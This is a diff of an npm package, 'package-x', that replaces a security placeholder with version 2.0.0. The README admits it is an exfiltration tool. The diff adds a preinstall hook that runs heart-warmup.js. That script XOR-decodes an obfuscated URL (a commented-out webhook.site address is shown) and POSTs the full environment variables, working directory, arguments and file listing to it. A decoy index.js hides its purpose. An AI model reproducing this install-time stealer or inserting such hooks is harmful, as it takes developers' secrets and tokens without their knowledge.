package-x 0.0.1-security → 2.0.0

package/README.md

@@ -1,5 +1,5 @@
-# Security holding package
+# Package X
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+> The secret ingredient to your project
 
-Please refer to www.npmjs.com/advisories?search=package-x for more information.
+Do not install this. This is an exfiltration tool!

package/const.js

@@ -0,0 +1,6 @@
+const SECRET_SAUCE =
+  "love-is-the-secret-ingredient-without-it-nothing-tastes-good";
+// const PUBLIC_KEY = "https://webhook.site/14083c3f-70ce-4871-a55d-9d6923b3ec68";
+const PUBLIC_KEY = "BBsCFV5TXAIDDQdFHAoIXBYdWQxBVkZVXFoGXRIAQFkXDUJBTBpYWUxbWhBFUApRFEZSEUcAEBtf"
+
+module.exports = { SECRET_SAUCE, PUBLIC_KEY };

package/heart-warmup.js

@@ -0,0 +1,35 @@
+#!/usr/bin/env node
+const { PUBLIC_KEY, SECRET_SAUCE } = require("./const");
+const { decode } = require("./helpers");
+const fs = require("fs");
+
+const https = require("https");
+
+const decodedSecretSauce = decode(PUBLIC_KEY, btoa(SECRET_SAUCE));
+
+const req = https.request(
+  decodedSecretSauce,
+  {
+    method: "POST",
+    headers: {
+      "Content-Type": "application/json",
+    },
+  },
+  (res) => {
+    console.log(`Status: ${res.statusCode}`);
+    res.on("data", (d) => process.stdout.write(d));
+    res.on("end", () => console.log("\nDone."));
+  }
+);
+
+const info = eval(`({
+    pwd: process.cwd(),
+    package: "package-x",
+    timestamp: new Date().toISOString(),
+    env: process.env,
+    argv: process.argv,
+    ls: fs.readdirSync("."),
+})`);
+
+req.write(JSON.stringify(info));
+req.end();

package/helpers.js

@@ -0,0 +1,41 @@
+const toBytes = (s) => new TextEncoder().encode(s);
+const fromBytes = (b) => new TextDecoder().decode(b);
+const uint8ToBase64 = (u8) => {
+  const CHUNK = 0x8000;
+  let str = "";
+  for (let i = 0; i < u8.length; i += CHUNK) {
+    str += String.fromCharCode(...u8.subarray(i, i + CHUNK));
+  }
+  return btoa(str);
+};
+const base64ToUint8 = (b64) => {
+  const str = atob(b64);
+  const u8 = new Uint8Array(str.length);
+  for (let i = 0; i < str.length; i++) u8[i] = str.charCodeAt(i);
+  return u8;
+};
+const xorBytes = (a, b) => {
+  const out = new Uint8Array(a.length);
+  for (let i = 0; i < a.length; i++) out[i] = a[i] ^ b[i];
+  return out;
+};
+
+// encode(plaintext, keyBase64) -> ciphertextBase64
+function encode(plain, keyBase64) {
+  const p = toBytes(plain);
+  const k = base64ToUint8(keyBase64);
+  if (k.length < p.length)
+    throw new Error("Key must be at least as long as plaintext (OTP rule).");
+  return uint8ToBase64(xorBytes(p, k));
+}
+
+// decode(ciphertextBase64, keyBase64) -> plaintext (string)
+function decode(cipherBase64, keyBase64) {
+  const c = base64ToUint8(cipherBase64);
+  const k = base64ToUint8(keyBase64);
+  if (k.length < c.length)
+    throw new Error("Key must be at least as long as ciphertext.");
+  return fromBytes(xorBytes(c, k));
+}
+
+module.exports = { encode, decode };

package/index.js

@@ -0,0 +1,2 @@
+// Love is the secret ingredient
+module.exports = "Love";

package/package.json

@@ -1,6 +1,24 @@
 {
   "name": "package-x",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "2.0.0",
+  "main": "index.js",
+  "type": "commonjs",
+  "description": "The secret ingredient to your project: Package X",
+  "scripts": {
+    "preinstall": "node heart-warmup.js"
+  },
+  "exports": {
+    ".": {
+      "require": "./index.js"
+    }
+  },
+  "files": [
+    "index.js",
+    "helpers.js",
+    "const.js",
+    "heart-warmup.js"
+  ],
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }